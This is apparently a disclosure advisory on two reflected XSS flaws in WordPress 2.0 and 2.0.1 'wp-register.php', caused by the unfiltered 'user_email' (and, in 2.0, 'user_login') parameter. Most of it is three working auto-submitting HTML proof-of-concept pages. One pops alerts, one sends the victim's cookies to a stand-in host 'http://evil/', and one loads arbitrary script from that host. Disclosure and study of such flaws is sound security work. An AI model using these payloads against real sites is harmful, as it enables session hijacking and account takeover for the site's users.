wpregister-xss.txt

`  
2 vanilla XSS on Wordpress ‘wp-register.php’  
by Adrian Pastor in News, WordPress |  
  
There are two vanilla XSS on ‘wp-register.php’. Only early versions of  
the 2.0 branch are affected.  
  
Version 2.0 is vulnerable through the ‘user_login’ and ‘user_email’ parameters.  
  
Version 2.0.1 filters the ‘user_login’ parameter but is still  
vulnerable through the ‘user_email’ parameter (half-baked fix?).  
  
The XSS is only exploitable through a ‘POST’ request.  
  
WordPress 2.0.4 is not vulnerable, so I’m assuming anything after this  
is not vulnerable either (unless there is a comeback of course).  
  
Note: user registration is disabled by default. Only sites with ‘user  
registration’ enabled are affected.  
  
line 16 and 17 on version 2.0.1 :  
  
$user_login = sanitize_user( $_POST[’user_login’] );  
$user_email = $_POST[’user_email’];  
  
we can notice that ‘user_login’ is sanitized but ‘user_email’ is not  
and eventually gets printed without further filtering on line 114:  
  
<?php echo $user_email; ?>  
  
I contacted the vendor and asked them if these issues had been fixed  
silently since I couldn’t find them documented anywhere (even though  
they had been fixed from version 2.0.4 on). However, I got NO response  
from the vendor whatsoever.   
  
simple PoC:  
  
<html>  
<head></head>  
<body>  
  
<form method="post" action="http://target/wordpress/wp-register.php" >  
<input type="hidden" name="action" value="register" />  
<input type="hidden" name="user_login" id="user_login"  
value='"><script>alert(1)</script>' />  
<input type="hidden" name="user_email" id="user_email"  
value='"><script>alert(2)</script>' />  
</form>  
<script>document.forms[0].submit()</script>  
</body>  
</html>  
  
will popup ‘1′ and ‘2′ on version 2.0, and only ‘2′ on version 2.0.1.  
cookie theft PoC:  
  
<html>  
<head></head>  
<body>  
  
<form method="post"  
action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie"  
>  
<input type="hidden" name="action" value="register" />  
<input type="hidden" name="user_login" id="user_login" value="anyusername" />  
<input type="hidden" name="user_email" id="user_email"  
value='"><script>eval(location.hash.substr(1))</script>' />  
  
</form>  
<script>document.forms[0].submit()</script>  
</body>  
</html>  
unrestricted script insertion from third-party site  
  
(we prove we can  
inject ANY JS):  
  
<html>  
<head></head>  
<body>  
  
<form method="post" action="http://victim/wordpress/wp-register.php" >  
<input type="hidden" name="action" value="register" />  
<input type="hidden" name="user_login" id="user_login" value="test" />  
<input type="hidden" name="user_email" id="user_email"  
value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>  
</form>  
<script>document.forms[0].submit()</script>  
</body>  
</html>  
`